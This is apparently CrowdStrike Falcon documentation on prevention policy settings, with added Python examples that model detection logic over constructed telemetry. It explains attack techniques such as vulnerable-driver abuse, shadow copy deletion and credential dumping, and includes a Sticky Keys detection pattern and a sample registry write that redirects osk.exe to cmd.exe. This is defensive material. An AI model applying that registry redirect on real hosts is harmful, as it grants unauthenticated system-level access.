It's extremely common for adversaries to leverage PowerShell to move laterally through organizations once they gain initial entry. It's also extremely common for malicious adversaries to leverage content and scripts downloaded and triggered by Office documents.

Important: This setting requires that either Interpreter-Only Visibility and/or Script-Based Execution Visibility be enabled as a prerequisite.

Suspicious Registry Operation Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

This setting blocks processes that exhibit suspicious registry-related behavior as defined by dynamic IOAs. It focuses on Autostart Extension Points (ASEPs) and security config changes.

When Suspicious Registry Operation Prevention is enabled, detections resulting in blocked registry operations will show Registry operation blocked in the Actions Taken section of a detection. As we continue to identify malicious activity that is impacting customers, we continuously update this prevention.

This setting is critical to preventing threats including emerging and zero-day ones related to persistence created by malware so it can load on system restart, as well as the disabling or enabling of services which can make a system vulnerable to attacks.

Container Drift Prevention

Requirements:

  • One of the following subscriptions:
    • Falcon Cloud Security with Containers CNAPP
    • Falcon Cloud Security with Containers Runtime Protection
    • Falcon for Managed Containers Runtime Protection
    • Falcon Cloud Security for Containers
  • Supported platform: Linux

Important: Make sure you have read the three-phase prevention policy settings for drift prevention before enabling this feature. For more info, see Three-phase prevention policy settings.

Container Drift Prevention protects containers from drift events. When this policy is enabled, if the RecentlyModifiedFileExecutedInContainer event is detected on a container, both the process that triggers the event and its parent process are terminated. This ensures that if the parent process is malicious or exploited, then the impact of the malicious activity is contained. This allows the runtime workload to continue without having to terminate the container to block the drift process. However, if the parent process is the container runtime, the container will automatically be stopped.

When following our recommendations for phase 2 in Three-phase prevention policy settings, you will have both binary- and script-based drift detection enabled. Use Drift Indicators in the Falcon console to monitor your containers for drift events and, if necessary, create exclusions for processes with expected drift prior to turning on drift detection. Go to Cloud security > Detections > Containers, then click Drift indicators. For more info, see Review detected and prevented container drift events and Enable drift prevention.

Enable the prevention policy only after you've created any required exclusions and you want to block all other drift processes. When enabled, drift is prevented on all containers running on the host. You might want to allow some drift processes in certain environments, for example on test servers or build environments. If exclusions don't make sense for these situations, we recommend adding those hosts to their own host group that does not have Container Drift Prevention enabled. For more info, see Create exclusions to allow expected container drift.

Note: Processes that are terminated as a result of Container Drift Prevention might be shown as Expired Process in the Event Investigation process tree. This only occurs if the event is detected by the Falcon Container sensor for Linux.
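
The following is an added example, not CrowdStrike code: it models the Container Drift Prevention decision described above over constructed events, so you can see how a RecentlyModifiedFileExecutedInContainer event is handled in detect-only mode, in prevention mode, with an exclusion, and when the parent is the container runtime. The process names, container ids, the names treated as "the container runtime", the extra event type, and the assumption that an exclusion suppresses the detection are all illustrative assumptions.

```python
from dataclasses import dataclass, field

DRIFT_EVENT = "RecentlyModifiedFileExecutedInContainer"  # event name used on the page


@dataclass(frozen=True)
class Process:
    pid: int
    name: str
    container_id: str


@dataclass(frozen=True)
class DriftEvent:
    event_type: str
    process: Process  # process that executed a file modified after container start
    parent: Process   # its parent process


@dataclass
class DriftPolicy:
    prevention_enabled: bool = False
    # Assumption: exclusions are matched on process name here; the console lets you
    # scope them more precisely (see "Create exclusions to allow expected container drift").
    excluded_processes: set = field(default_factory=set)
    # Assumption: constructed process names standing in for "the container runtime".
    runtime_names: set = field(default_factory=lambda: {"containerd-shim", "runc"})


def evaluate(policy: DriftPolicy, ev: DriftEvent) -> dict:
    """Return the detection verdict and the actions the described policy would take."""
    if ev.event_type != DRIFT_EVENT:
        return {"detection": False, "actions": []}
    if ev.process.name in policy.excluded_processes:
        # Expected drift covered by an exclusion: no detection, nothing killed (assumed).
        return {"detection": False, "actions": ["excluded"]}
    result = {"detection": True, "actions": []}
    if not policy.prevention_enabled:
        return result  # detection only: shows under Drift Indicators, nothing terminated
    if ev.parent.name in policy.runtime_names:
        # Parent is the container runtime, so the whole container is stopped.
        result["actions"].append(f"stop_container:{ev.process.container_id}")
    else:
        # Terminate the drifted process and its parent; the container keeps running.
        result["actions"].extend([f"kill:{ev.process.pid}", f"kill:{ev.parent.pid}"])
    return result


# Constructed sample events (container ids, process names and the
# "ProcessStarted" event type are invented for this example).
WEB, BUILD = "c0ffee01", "b00b1e02"
SAMPLES = [
    DriftEvent(DRIFT_EVENT, Process(4242, "/tmp/.x/miner", WEB), Process(4000, "sh", WEB)),
    DriftEvent(DRIFT_EVENT, Process(5151, "/tmp/payload", WEB), Process(5000, "containerd-shim", WEB)),
    DriftEvent(DRIFT_EVENT, Process(6161, "/workspace/out/app", BUILD), Process(6000, "make", BUILD)),
    DriftEvent("ProcessStarted", Process(7171, "nginx", WEB), Process(7000, "sh", WEB)),
]


def run(prevention_enabled: bool) -> list:
    """Evaluate all samples under a policy that excludes the build container's expected drift."""
    policy = DriftPolicy(prevention_enabled=prevention_enabled,
                         excluded_processes={"/workspace/out/app"})
    return [evaluate(policy, ev) for ev in SAMPLES]


if __name__ == "__main__":
    for mode in (False, True):
        print(f"prevention_enabled={mode}")
        for ev, res in zip(SAMPLES, run(mode)):
            print(f"  {ev.process.name:20} detection={res['detection']} actions={res['actions']}")
```

Running it with prevention off shows the two web-container drift events as detections only, which is the state in which you review Drift Indicators and decide on exclusions; turning prevention on then kills the process and parent for the first event and stops the container for the second, while the excluded build process is untouched in both modes.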

Intelligence-Sourced Threat Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platforms: Windows and Mac

When this setting is enabled, the Falcon sensor blocks high-severity detected processes that CrowdStrike's Intelligence analysts have classified as malicious; these classifications are focused on high-confidence, static hash-based IOCs. Known malicious portable executable files can be any type of malware, including ransomware, loaders, and keyloggers.

Driver Load Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported operating systems: Windows 10 and Windows Server 2016 and later.

This setting enables the driver prevention feature and blocks the loading of known malicious kernel mode drivers identified by CrowdStrike analysts. Drivers are blocked by hash. This includes drivers that don't violate any of the rules of HVCI or System Guard. This setting works with or without those mitigations and doesn’t interfere with or interrupt them in any way.

Vulnerable Driver Protection

Requirements:

  • Subscription: Falcon Prevent

  • Supported operating systems: Windows 10 and later; Windows Server 2016 and later.

Important: Enabling the Driver Load Prevention setting, previously called Suspicious Kernel Drivers, is required to use this setting.

When enabled, the sensor quarantines and blocks the loading of newly written vulnerable drivers. These drivers are identified by CrowdStrike analysts as containing security vulnerabilities that can be abused in Bring Your Own Vulnerable Driver (BYOVD) attack scenarios, so this feature provides a layer of protection against attacks that use BYOVD techniques.

When you enable Vulnerable Driver Protection on your prevention policy, the following takes place:

  • PE files newly written to storage are monitored and telemetry is generated through the PeFileWritten event.

  • The data in the PeFileWritten events is compared to a dynamic list of vulnerable drivers identified by CrowdStrike's analysts.

  • If CrowdStrike has identified a driver as vulnerable, the driver may be quarantined and/or blocked from loading.

  • Appropriate detections are generated.

Note: Vulnerable Driver Protection doesn’t evaluate existing drivers that are already installed.
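
The following is an added example, not CrowdStrike code: it walks through the four steps above as a small model, hashing constructed "driver" bytes, matching PeFileWritten events against a constructed stand-in for the analysts' list, and showing both the prerequisite (Driver Load Prevention must be on) and the note that drivers already on disk are never evaluated. The file paths, driver bytes and the blocklist are all constructed; no real driver hash appears here.

```python
import hashlib
from dataclasses import dataclass


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed driver images: an "MZ" header plus a body that makes the hashes differ.
# Neither is a real driver, and neither hash is a real CrowdStrike indicator.
VULN_DRIVER_BYTES = b"MZ" + b"constructed vulnerable driver image"
CLEAN_DRIVER_BYTES = b"MZ" + b"constructed benign driver image"

# Constructed stand-in for the analysts' dynamic list, keyed by SHA-256.
VULNERABLE_DRIVER_HASHES = {
    sha256_hex(VULN_DRIVER_BYTES): "example-vulnerable.sys (constructed label)",
}


@dataclass(frozen=True)
class PeFileWritten:
    """Telemetry for a PE file newly written to storage (event name from the page)."""
    path: str
    sha256: str


@dataclass
class PreventionPolicy:
    driver_load_prevention: bool = False       # prerequisite setting
    vulnerable_driver_protection: bool = False


def evaluate_write(policy: PreventionPolicy, ev: PeFileWritten, blocklist: dict) -> dict:
    """Decide what the described setting does for one PeFileWritten event."""
    verdict = {"path": ev.path, "actions": [], "detection": None}
    if not (policy.driver_load_prevention and policy.vulnerable_driver_protection):
        return verdict  # inactive: the setting needs Driver Load Prevention enabled
    label = blocklist.get(ev.sha256)
    if label is None:
        return verdict  # hash is not on the vulnerable-driver list
    verdict["actions"] = ["quarantine", "block_load"]
    verdict["detection"] = f"Vulnerable driver written: {label}"
    return verdict


def evaluate_host(policy, writes, preinstalled, blocklist) -> dict:
    """Only newly written files are compared; drivers already on disk are not evaluated."""
    return {
        "evaluated": [evaluate_write(policy, ev, blocklist) for ev in writes],
        "not_evaluated": [path for path, _ in preinstalled],
    }


# Constructed host state: two new writes and one driver that predates the sensor.
WRITES = [
    PeFileWritten(r"C:\Users\alice\Downloads\drv\example-vulnerable.sys", sha256_hex(VULN_DRIVER_BYTES)),
    PeFileWritten(r"C:\Windows\System32\drivers\example-clean.sys", sha256_hex(CLEAN_DRIVER_BYTES)),
]
PREINSTALLED = [(r"C:\Windows\System32\drivers\legacy.sys", sha256_hex(VULN_DRIVER_BYTES))]


def run(vulnerable_driver_protection: bool, driver_load_prevention: bool = True) -> dict:
    policy = PreventionPolicy(driver_load_prevention=driver_load_prevention,
                              vulnerable_driver_protection=vulnerable_driver_protection)
    return evaluate_host(policy, WRITES, PREINSTALLED, VULNERABLE_DRIVER_HASHES)


if __name__ == "__main__":
    for verdict in run(True)["evaluated"]:
        print(verdict)
    print("not evaluated:", run(True)["not_evaluated"])
```

The pre-installed legacy.sys deliberately carries the same hash as the flagged download: the model still leaves it alone, because there is no PeFileWritten event for it, which is exactly the gap the note above describes and the reason to inventory existing drivers separately.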

File System Containment

Requirements:

  • Subscription: Falcon Prevent
  • Supported operating systems: Windows 10 version 1809 and later, Windows Server 2016 and later
  • Sensor support: Falcon sensor for Windows version 7.21 and later
  • Default roles: Falcon Administrator
  • CrowdStrike clouds: Available in all clouds

File system containment enables the sensor to quickly respond to malicious remote file system activity detected on a host, such as ransomware attacks over the Server Message Block (SMB) protocol.

How file system containment works

When File system containment is enabled and the sensor detects malicious remote file system activity occurring on the host, the following actions take place:

  • The sensor contains the identified remote user account on the host, preventing any further destructive remote file system activity from the identified remote user account.

  • The remote user account remains contained until File system containment is lifted in Host Management or Endpoint detections.

For more info about File system containment, see File System Containment.

Boot Configuration Database Protection

Requirements:

  • Subscription: Falcon Prevent
  • Supported platform: Windows
  • Sensor support: Falcon sensor for Windows 7.25 and later
  • Prevention Policies: The Suspicious registry operation prevention setting must be enabled as a prerequisite to enable the Boot configuration database protection setting.
    • For sensor versions 7.24 and earlier: Falcon sensor for Windows performs Operational Block (OP BLOCK) actions for Windows Boot Configuration Database Store (BCD) related detections if you enable this setting:
      • Suspicious registry operation prevention
    • For sensor versions 7.25 and later: To activate Operational Block (OP BLOCK) actions, enable both of these settings:
      • Suspicious registry operation prevention
      • Boot configuration database protection
    • If only Suspicious registry operation prevention is enabled, these detections default to Detect Only.
  • Default roles: Falcon Administrator
  • CrowdStrike clouds: Available in all clouds

When enabled, the Boot configuration database protection prevention policy setting prevents adversaries from maliciously modifying critical Windows boot settings in the BCD registry hive. If you don't enable this setting, adversaries can make modifications and then perform the following actions:

  • Disable Driver Signature Enforcement (DSE)

  • Force endpoints into Safe Mode

  • Disable Early Launch Anti-malware (ELAM) protection

  • Create potential evasion or persistence mechanisms

Note: When disabled, detections related to suspicious and malicious modification of the Windows BCD registry hive still occur, but no preventative action is taken.

This setting protects against suspicious and malicious changes to the Windows BCD registry hive based on analysis of known adversary behavior and intrusions, but it is not intended to block all changes to the Windows BCD registry hive. CrowdStrike detection engineers continuously monitor the threat landscape and enhance detection coverage through dynamic content updates.

Exploit Mitigation category

Exploit Mitigation stops attempts to exploit vulnerabilities and prevents hosts from being compromised.

When enabled, prevention is only applied to new processes that start after the feature has been enabled. Any applications that were already running are still unprotected until the next restart.

When turned off, the prevention is no longer applied to new processes, but still exists for any processes that were already running with protection enabled. However, when one of those processes exits and restarts, it starts without exploit mitigation protection.

For Force ASLR, Force DEP, and Heap Spray Preallocation

By definition, none of these three exploit mitigation preventions can be a false positive in the classic sense, because the detection condition absolutely occurred. There's no interim state; the condition is either met or it isn't. However, some otherwise legitimate products, such as Java or Microsoft Office releases before 2010, have known code defects that can trigger exploit mitigation preventions in the absence of truly malicious action.

The upside is that Falcon can detect these conditions and kill the process chain quickly. The downside is that, as a side effect of killing the process chain so early, less detection data is available than for most other preventions, which can make it harder to determine whether an individual prevention was malicious or just the result of poor code.

We recommend enabling ASLR and Heap Spray prevention because, while it's possible for ASLR and Heap Spray preventions to result from code defects, unless you're running very old versions of Office and similar software the odds are far higher that the activity is genuinely malicious, and these techniques are regularly used by adversaries. Both ASLR bypass and heap sprays are used in memory corruption attacks against memory-safety vulnerabilities in software. Common attacks prevented by these settings are stack overflows, attacks on browsers that don't adhere to ASLR, and ASLR bypass using Return-Oriented Programming (ROP) gadgets.

We don't recommend enabling Force DEP because the opposite is generally true: Force DEP preventions frequently still result from code defects. If you want to enable Force DEP, test it extensively before enabling it in production.

ASLR Bypass Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Important: This setting requires Additional User Mode Data Visibility. For more info, see Additional User Mode Data Visibility.
Important: This setting is inoperative on Windows ARM64-based hosts.

When enabled, Address Space Layout Randomization bypass attempts will be detected and blocked. Almost every DLL is designed to be relocatable and to function normally when placed in a memory location other than its default address. Falcon doesn't relocate any DLL that is not relocatable or any DLL that Windows or another security tool has already relocated from its default. Additionally, Falcon doesn't apply these prevention policies to applications that don't handle ASLR safely.

DEP Bypass Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Important: This setting requires Additional User Mode Data Visibility. For more info, see Additional User Mode Data Visibility.
Important: This setting is inoperative on Windows ARM64-based hosts.

Force DEP Prevention prevents a process that had Force Data Execution Prevention applied from executing non-executable memory. If you want to enable the Force DEP policy option, we strongly recommend significant testing prior to making that change on production systems in order to avoid potentially blocking legitimate applications.

Heap Spray Pre-allocation Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Important: This setting requires Additional User Mode Data Visibility. For more info, see Additional User Mode Data Visibility.
Important: This setting is inoperative on Windows ARM64-based hosts.

When enabled, Heap Spray Pre-allocation attempts are detected and blocked. This is a popular technique for remotely hijacking browsers. Heap Sprays fragment memory, so a known failure would be software that tries to allocate a large block of contiguous memory, as for example Java occasionally does.

NULL Page Allocation Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Important: This setting requires Additional User Mode Data Visibility.
Important: This setting is inoperative on Windows ARM64-based hosts.

NULL Page Allocation Prevention prevents the exploitation of null pointer dereferences, which become exploitable when the stack pointer address is set to NULL. If the exploit also controls adjacent memory, this can lead to remote code execution. This is a popular mechanism used by adversaries for executing remote code.

SEH Overwrite Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Important: This setting requires Additional User Mode Data Visibility.
Important: This setting is inoperative on Windows ARM64-based hosts.

The Structured Exception Handler (SEH) maintains a chain of pointers to each exception handler. By overwriting these pointers with the address of malicious code, the SEH Overwrite technique can control execution, bypassing common mitigations including ASLR and DEP. This option detects and prevents exploits that attempt to gain execution by overwriting an SEH. This is a popular mechanism used by adversaries for executing remote code.

Unauthorized Remote Access IOAs category

Chopper Webshell Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Mac

Chopper Webshell attacks occur when an attacker controls the content of a web page that’s served by an organization’s web server. This malicious web page is used to provide a remote shell from a victim server to a Chopper client that’s running on a remote attacker machine. Preventing the creation of Chopper Webshell code prohibits further exploitation activity such as persistence, lateral movement, and credential theft.

XPCOM Shell Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Mac

This option prevents the execution of an XPCOM (JavaScript) shell, which is often used to make a network connection when exploiting vulnerabilities within Firefox.

When enabled, it detects and blocks any command webshell.

Empyre Backdoor Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Mac

This option terminates a process with behaviors indicative of the Empyre Backdoor, which provides remote access to hosts. Empyre is a post-exploitation framework built using Python.

Credential Dumping IOAs category

KcPassword Decoded Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Mac

This setting prevents an attempt to recover a plaintext password using the kcpassword file; kcpassword is a script-based macOS autologin enabler.

Hash Collector Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Mac

This setting prevents an attempt to dump a user’s hashed password.

Ransomware category

Backup Deletion Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

When enabled, this setting detects and blocks processes that attempt to delete all volume shadow copies, a very common, key tactic used by some ransomware variants.

Important: This option doesn't apply to known good allowlisted processes.

Cryptowall Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

When enabled, this setting blocks most known variants of Cryptowall.

File Encryption Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

When enabled, File Encryption Prevention detects and blocks a process that traverses a directory and starts encrypting individual files on disk using known extensions. It is possible that one file may be encrypted prior to process termination.

Locky Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

When enabled, it detects and blocks most known variants of Locky ransomware.

File System Access Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

When enabled, File System Access Prevention stops processes that perform a high volume of file system operations, a behavior pattern common in ransomware. It detects and blocks generic ransomware variants.

Volume Shadow Copy - Audit

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Deletion of shadow copies is a common pre-encryption phase in ransomware attacks, performed to make recovery more difficult and therefore increase the pressure on the victim to pay the ransom. Turning on Volume Shadow Copy - Audit is the first step toward enabling the Volume Shadow Copy - Protect feature. When Volume Shadow Copy - Audit is turned on, Falcon identifies software that would be prevented from manipulating volume shadow copies if the setting were in protection mode.

Many legitimate backup software applications make use of Windows volume shadow copies, so it’s important to review the list of detections in audit mode and allowlist all legitimate applications before turning on protection mode. For more info, see Exclusions.

Volume Shadow Copy - Protect

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Important: You must enable Volume Shadow Copy - Audit before enabling Volume Shadow Copy - Protect.

When enabled, Volume Shadow Copy - Protect stops any process that attempts to delete volume shadow copies unless the customer has explicitly allowlisted that process. This protects Windows volume shadow copies from deletion by unauthorized software.

Before enabling Volume Shadow Copy - Protect, enable Volume Shadow Copy - Audit to identify legitimate software applications, including backup software, that should be allowed to manipulate volume shadow copies when the feature is in protection mode, and then add them to your allowlist.

Legitimate applications detected through Volume Shadow Copy - Audit must be allowlisted using IOA exclusion prior to enabling Volume Shadow Copy - Protect. For more info, see Exclusions.
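
The following is an added example, not CrowdStrike code: it models the audit-then-protect workflow described above so the ordering is concrete. Audit mode only reports which images would be blocked, that list is reviewed and the approved backup software is allowlisted, and only then is protection turned on. The process images, the operation labels, and the representation of the allowlist are constructed for illustration; in the console the allowlist is an IOA exclusion.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ShadowCopyEvent:
    """Constructed telemetry: which image touched volume shadow copies and how."""
    image_path: str
    operation: str  # "delete_shadow_copies" or "create_shadow_copy" (constructed labels)


def shadow_copy_policy(audit: bool, protect: bool, allowlist: frozenset, events) -> list:
    """One record per event. Audit mode reports what protection mode would block;
    protection mode blocks deletions from images that are not allowlisted."""
    if protect and not audit:
        raise ValueError("Volume Shadow Copy - Protect requires Volume Shadow Copy - Audit")
    records = []
    for ev in events:
        rec = {"image": ev.image_path, "operation": ev.operation, "action": "none"}
        if audit and ev.operation == "delete_shadow_copies":
            if ev.image_path in allowlist:
                rec["action"] = "allowed"
            elif protect:
                rec["action"] = "blocked"
            else:
                rec["action"] = "would_be_blocked"
        records.append(rec)
    return records


def candidates_from_audit(records) -> list:
    """Images flagged in audit mode, i.e. what you review before allowlisting."""
    return sorted({r["image"] for r in records if r["action"] == "would_be_blocked"})


# Constructed events: a backup agent that legitimately rotates shadow copies,
# and an unknown binary deleting them.
BACKUP_AGENT = r"C:\Program Files\Contoso Backup\bkagent.exe"
EVENTS = [
    ShadowCopyEvent(BACKUP_AGENT, "create_shadow_copy"),
    ShadowCopyEvent(BACKUP_AGENT, "delete_shadow_copies"),
    ShadowCopyEvent(r"C:\Users\Public\update.exe", "delete_shadow_copies"),
]


def staged_rollout(approved: frozenset) -> dict:
    """Audit first, review the flagged images, allowlist the approved ones, then protect."""
    audit = shadow_copy_policy(audit=True, protect=False, allowlist=frozenset(), events=EVENTS)
    review = candidates_from_audit(audit)
    allowlist = frozenset(image for image in review if image in approved)
    protect = shadow_copy_policy(audit=True, protect=True, allowlist=allowlist, events=EVENTS)
    return {"audit": audit, "review": review, "allowlist": allowlist, "protect": protect}


if __name__ == "__main__":
    out = staged_rollout(frozenset({BACKUP_AGENT}))
    for phase in ("audit", "protect"):
        print(phase, [(r["image"].rsplit("\\", 1)[-1], r["action"]) for r in out[phase]])
```

The audit pass flags both the backup agent and the unknown binary; after the reviewer approves only the backup agent, the protect pass allows it and blocks the unknown deletion, which is the outcome you want before turning the setting on fleet-wide.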

Exploitation Behavior category

Exploitation Behavior Prevention IOAs involve blocking activities that occur immediately after the initial exploitation of an application.

Application Exploitation Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

When enabled, the creation of a process, such as a command prompt (cmd.exe), from an exploited browser or browser Flash plugin is blocked.

Chopper Webshell Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Chopper webshell attacks occur when an attacker controls the content of a web page that’s served by an organization’s web server. This malicious web page is used to provide a remote shell from a victim server to a Chopper client that’s running on a remote attacker machine.

Preventing the creation of Chopper WebShell code prohibits further exploitation activity such as persistence, lateral movement, and credential theft.

Drive-by Download Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

When enabled, this setting detects and blocks files that the browser writes to a temp location and then executes. The sensor attempts to terminate both the new process and the parent browser.

Code Injection Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Important: Requires Additional User Mode Data Visibility.

When enabled, it kills processes attempting PowerShell injection into other processes, such as Task Manager or Firefox, which adversaries will do to evade detection.

JavaScript Execution Via Rundll32 Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

When enabled, JavaScript executing from a command line through rundll32.exe is prevented. This is a popular method used to bypass Microsoft AppLocker or other software restriction policies by using an allowed application to execute malicious code.

Lateral Movement and Credential Access category

This category covers the prevention of activity that is used to escalate logon privileges, such as the usage of Windows Logon Bypass to open a command prompt.

Windows Logon Bypass ("Sticky Keys") Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

This category covers the prevention of post-exploit activity that is used to escalate logon privileges, such as the usage of Windows Logon Bypass (aka "Sticky Keys") to open a command prompt without having to logon.

When enabled, it detects and blocks a process that attempts to alter the registry entry controlling execution of the on-screen keyboard (osk.exe) so that it launches another process, such as cmd.exe. Doing so would let the new process run with system privileges without authentication. Windows Logon Bypass-based attacks are used to obtain persistence. Linking the Windows logon to command prompts or batch processes can cause false positives with this setting, because those are high-risk security practices that everyone should avoid. We recommend leaving this option enabled and adjusting your logon practices. If that's not possible, the second-best option is to move systems that you want to run such processes, such as kiosks, into a separate policy group from those that don't need to run them.
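
The following is an added example, not CrowdStrike code: detection logic for the registry change described above, run over constructed registry-write telemetry, with the kiosk case handled the way the paragraph recommends (a separate host group whose policy leaves the setting off, so those hosts get a detection but no block). The Image File Execution Options key is the standard registry location for this technique (MITRE ATT&CK T1546.008) and is not named on the page; osk.exe is the binary the page names, and the other accessibility binaries in the list are an assumed generalization. Host names, processes and data values are constructed.

```python
from dataclasses import dataclass

# Image File Execution Options (IFEO): its "Debugger" value redirects launches of the
# named executable. Not named on the page; standard location for this technique.
IFEO_PREFIX = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" + "\\"

# osk.exe is the binary the page names; the rest are an assumed generalization to the
# other accessibility binaries reachable from the logon screen.
ACCESSIBILITY_BINARIES = {"osk.exe", "sethc.exe", "utilman.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}


@dataclass(frozen=True)
class RegistryWrite:
    """Constructed registry-write telemetry."""
    host: str
    process: str
    key: str
    value_name: str
    data: str


def ifeo_target(key: str):
    """Executable name an IFEO subkey applies to, or None if the key is not under IFEO."""
    if not key.lower().startswith(IFEO_PREFIX.lower()):
        return None
    return key[len(IFEO_PREFIX):].split("\\")[0].lower()


def is_logon_bypass_write(w: RegistryWrite) -> bool:
    """True when a Debugger value is set for an accessibility binary."""
    return ifeo_target(w.key) in ACCESSIBILITY_BINARIES and w.value_name.lower() == "debugger"


def evaluate(writes, host_groups: dict, setting_by_group: dict) -> list:
    """Flag matching writes; the action depends on the host's policy group.
    Hosts whose group has the setting off still get a detection (detect only)."""
    findings = []
    for w in writes:
        if not is_logon_bypass_write(w):
            continue
        group = host_groups.get(w.host, "default")
        prevention_on = setting_by_group.get(group, True)
        findings.append({
            "host": w.host,
            "process": w.process,
            "target": ifeo_target(w.key),
            "debugger": w.data,
            "action": "blocked" if prevention_on else "detect_only",
        })
    return findings


# Constructed sample telemetry.
WRITES = [
    RegistryWrite("ws-01", "reg.exe", IFEO_PREFIX + "osk.exe", "Debugger", r"C:\Windows\System32\cmd.exe"),
    RegistryWrite("kiosk-07", "setup.exe", IFEO_PREFIX + "osk.exe", "Debugger", r"C:\Kiosk\launcher.bat"),
    # A developer registering a just-in-time debugger for notepad.exe: not an accessibility binary.
    RegistryWrite("ws-02", "devenv.exe", IFEO_PREFIX + "notepad.exe", "Debugger", r"C:\Tools\vsjitdebugger.exe"),
    # Another IFEO value for osk.exe that is not Debugger.
    RegistryWrite("ws-01", "msiexec.exe", IFEO_PREFIX + "osk.exe", "GlobalFlag", "0x00000002"),
]
HOST_GROUPS = {"kiosk-07": "kiosks"}                   # kiosks live in their own host group
SETTING_BY_GROUP = {"default": True, "kiosks": False}  # setting left off only for kiosks


def run() -> list:
    return evaluate(WRITES, HOST_GROUPS, SETTING_BY_GROUP)


if __name__ == "__main__":
    for finding in run():
        print(finding)
```

Only the two osk.exe Debugger writes are flagged; the workstation write is blocked while the kiosk write is recorded as detect-only, and the notepad.exe debugger registration and the non-Debugger value pass through, which is the false-positive boundary the paragraph is describing.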

Credential Dumping Prevention

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

Important: Requires Additional User Mode Data Visibility. For more info, see Additional User Mode Data Visibility.

This setting detects and prevents suspicious processes that are stealing logins and passwords, such as Mimikatz, that allow an adversary with elevated permissions to read credentials out of the LSASS process. LSASS-based credential dumping is a popular tactic to acquire and maintain host/environment access by adversaries.

Remediation category

Advanced Remediation

Requirements:

  • Subscription: Falcon Prevent

  • Supported platform: Windows

When you enable the Advanced Remediation setting, Falcon kills processes, quarantines files, and deletes ASEP registry values, scheduled tasks, and services for certain IOA detections. When enabled, this setting quarantines files as part of remediations even if the Quarantine Files setting is disabled. The remediation actions Falcon performs depend on the detection, and Falcon doesn’t perform remediation on all detections. Because remediations occur post-detection, a quarantine race condition with a Traditional AV is extremely unlikely.

Note: CrowdStrike performs safety checks for critical processes, critical file paths, and critical PIDs as it performs remediation to ensure that the actions taken don’t interfere with current system processes, boot-up, or login sequences.

  • Kill processes: Falcon kills the triggering process, its parent, and/or its grandparent process.

  • Quarantine files: Files quarantined can include executable files, dynamic-link libraries (DLLs) and other non-process executable file types written by a process, such as config text files. Falcon can quarantine files that were used to create or write the triggering process, its parent, and/or its grandparent process.

  • Remove ASEPs: Delete registry values related to ASEP registry-based entries such as run keys. Falcon can remove registry values, scheduled tasks, or services created by the triggering process, its parent, and/or its grandparent process.

Advanced Remediation isn’t retroactive. If the Advanced Remediation policy setting is disabled at the time of a detection, Falcon won't retroactively perform remediation after the setting is turned on.

Falcon doesn’t provide a setting to undo the removal of ASEP registry values, scheduled tasks, or services. To restore removed persistence entries, release the associated quarantined binary and then rerun the binary. Consider whether the triggering detection needs to be added to your allowlist. See Exclusions for more information about managing your allowlist.

Falcon doesn’t report error conditions for failed remediation actions. Files quarantined through remediation are only supported if they are hosted on storage the host OS views as local. Files hosted on remote drives aren’t quarantined.

Cloud-based detections category

The Cloud-based detections category includes settings that control which detection events are generated when the CrowdStrike cloud identifies potentially malicious behavior patterns, such as suspicious command chains and unusual execution patterns.

Cloud-based anomalous process execution

Requirements:

  • Subscription: Falcon Insight XDR or Falcon Prevent

  • Supported platform: Windows

The Cloud-based anomalous process execution prevention policy setting uses AI-powered Indicators of Attack (IOAs) to identify suspicious behaviors associated with legitimate LOLBins that attackers commonly use for malicious purposes.

Cloud-based anomalous process execution is disabled by default. When you enable it, the system monitors and identifies potentially malicious activities involving LOLBins on your Windows hosts. You can use the policy slider setting to control detection sensitivity. Higher settings provide more detections but might increase false positives. Moderate is the recommended setting. We don't recommend using the Aggressive or Extra-Aggressive settings outside of penetration and stress testing scenarios.

Detection events are generated with comprehensive process ancestry information, such as child, parent, and grandparent processes. This gives security teams complete context about potential threats. This information might be used to create IOA exclusions to see fewer false positives. For more info about applying exclusions, see IOA exclusions.

Three-phase prevention policy settings

Falcon Prevent and Falcon Insight XDR include 3 pre-configured prevention policies that you can deploy in phases:

  • Phase 1 - initial deployment
  • Phase 2 - interim protection
  • Phase 3 - optimal protection

This multi-phase approach offers a structured path from initial deployment to full realization of our best practices. If you're running pre-existing antivirus or HIPS suites, start with phase 1 to reduce possible conflicts. If you aren't running antivirus or HIPS suites, start with phase 2. Leverage change control procedures to advance hosts to the next phase, adjusting exclusions, IOC management, and custom IOA rules to refine the configuration and reduce false positives.

Typically, it should take no more than 45 days to complete full sensor deployment to all eligible endpoints and move into phase 2 settings. It should take no more than 90 days after deployment to apply phase 3 settings to all hosts.

